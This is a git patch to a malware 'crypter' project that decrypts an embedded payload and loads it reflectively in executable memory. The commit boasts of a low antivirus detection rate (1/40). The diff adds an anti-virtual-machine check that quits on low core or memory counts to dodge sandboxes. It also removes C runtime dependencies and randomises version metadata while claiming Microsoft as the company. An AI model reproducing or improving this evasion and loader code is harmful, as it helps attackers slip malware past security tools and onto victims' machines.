From 1d74de9a6eb5db2677fa5a530ba2d2dd0de4788e Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Mon, 18 Mar 2024 22:28:26 +0100 Subject: [PATCH] removed CRT, add anti vm, 1/40 detects eScan Gen:Variant.Lazy.273251 --- Crypter/config.h | 2 +- Crypter/main.cpp | 38 ++++++++++++++++++++------ Crypter/patate-crypter.rc | 8 +++--- Crypter/patate-crypter.vcxproj | 3 ++ Crypter/patate-crypter.vcxproj.filters | 6 ++++ 5 files changed, 43 insertions(+), 14 deletions(-) diff --git a/Crypter/config.h b/Crypter/config.h index 9dde3f6..6293653 100644 --- a/Crypter/config.h +++ b/Crypter/config.h @@ -1,2 +1,2 @@ #pragma once -#define KEY "" \ No newline at end of file +#define KEY "ouhuoqhzdb" \ No newline at end of file diff --git a/Crypter/main.cpp b/Crypter/main.cpp index 076aaea..9abdeb0 100644 --- a/Crypter/main.cpp +++ b/Crypter/main.cpp @@ -10,7 +10,7 @@ HMODULE hModule2; LPVOID lpReserved2; -#define NEW_ADDRESS 0x10000 +#define NEW_ADDRESS 0x00 // Define a macro for the debug printf #ifdef _DEBUG @@ -30,9 +30,17 @@ Works with : - Doesn't copy headers */ +size_t my_strlen(const char* str) { + //START + size_t s = 0; + for (; str[s] != '\0'; ++s); + return s; + //END +} + void decrypt(const char* key, int offset = 0, int limit = -1) { //START - size_t key_size = strlen(key); + size_t key_size = my_strlen(key); const int bufferSize = sizeof(sample) / sizeof(sample[0]); if (limit == -1) limit = bufferSize; if (key_size == 0) return; @@ -73,7 +81,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) } const size_t image_size = nt_headers->OptionalHeader.SizeOfImage; - void* image_base = VirtualAlloc((LPVOID)newBase, image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + void* image_base = (LPVOID)newBase; + image_base = VirtualAlloc(image_base, image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (image_base == NULL) { return NULL; } @@ -86,7 +95,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) memcpy(static_cast(image_base) + section_header->VirtualAddress, static_cast(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData); decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section } - + DEBUG_PRINTF("[+] Wrote section data\n"); DEBUG_PRINTF("[+] Rebasing Dll\n"); @@ -105,7 +114,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) HMODULE import_dll = LoadLibraryA(import_dll_name); if (import_dll == NULL) { - VirtualFree(image_base, 0, MEM_RELEASE); return NULL; } @@ -140,7 +148,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) DEBUG_PRINTF("[+] Doing relocation\n"); const IMAGE_BASE_RELOCATION* base_relocation = reinterpret_cast(static_cast(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - DWORD delta = newBase - nt_headers->OptionalHeader.ImageBase; + DWORD delta = (DWORD)image_base - nt_headers->OptionalHeader.ImageBase; while (base_relocation->VirtualAddress != 0) { const WORD* relocation_block = reinterpret_cast(base_relocation + 1); @@ -206,13 +214,27 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm #endif { //START - #ifdef _DEBUG allo(); #endif DEBUG_PRINTF("[+] Started\n"); + MEMORYSTATUSEX memoryStatus; + memoryStatus.dwLength = sizeof(memoryStatus); + GlobalMemoryStatusEx(&memoryStatus); + ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys; + + // Convert total physical memory to gigabytes + double totalPhysicalMemoryGB = static_cast(totalPhysicalMemory) / (1024 * 1024 * 1024); + + // Get the number of processor cores + SYSTEM_INFO systemInfo; + GetSystemInfo(&systemInfo); + DWORD numProcessorCores = systemInfo.dwNumberOfProcessors; + if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) + return 0; + const int bufferSize = sizeof(sample) / sizeof(sample[0]); HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS); @@ -221,8 +243,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm return 1; } - ::FreeLibrary(dll); - return 0; //END } diff --git a/Crypter/patate-crypter.rc b/Crypter/patate-crypter.rc index f589799..a5a687a 100644 --- a/Crypter/patate-crypter.rc +++ b/Crypter/patate-crypter.rc @@ -68,12 +68,12 @@ BEGIN BLOCK "040c04b0" BEGIN VALUE "CompanyName", "Microsoft" - VALUE "FileDescription", "qhffltbhaqzfykugipsz" + VALUE "FileDescription", "qgfozummtzttkchjglkz" VALUE "FileVersion", "1.0.0.1" - VALUE "InternalName", "gqhfyim.exe" + VALUE "InternalName", "oiablyy.exe" VALUE "LegalCopyright", "Copyright (C) 2023" - VALUE "OriginalFilename", "ddyshnw.exe" - VALUE "ProductName", "swtvick.exe" + VALUE "OriginalFilename", "tmzponf.exe" + VALUE "ProductName", "oeozjqg.exe" VALUE "ProductVersion", "1.0.0.1" END END diff --git a/Crypter/patate-crypter.vcxproj b/Crypter/patate-crypter.vcxproj index 06116f1..4c4935b 100644 --- a/Crypter/patate-crypter.vcxproj +++ b/Crypter/patate-crypter.vcxproj @@ -127,6 +127,8 @@ /NXCOMPAT:no %(AdditionalOptions) %(AdditionalDependencies) false + + @@ -152,6 +154,7 @@ NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true stdcpp17 + MultiThreaded Console diff --git a/Crypter/patate-crypter.vcxproj.filters b/Crypter/patate-crypter.vcxproj.filters index db9ee56..6ebff34 100644 --- a/Crypter/patate-crypter.vcxproj.filters +++ b/Crypter/patate-crypter.vcxproj.filters @@ -18,6 +18,9 @@ Fichiers sources + + Fichiers sources + @@ -29,6 +32,9 @@ Fichiers d%27en-tĂȘte + + Fichiers d%27en-tĂȘte +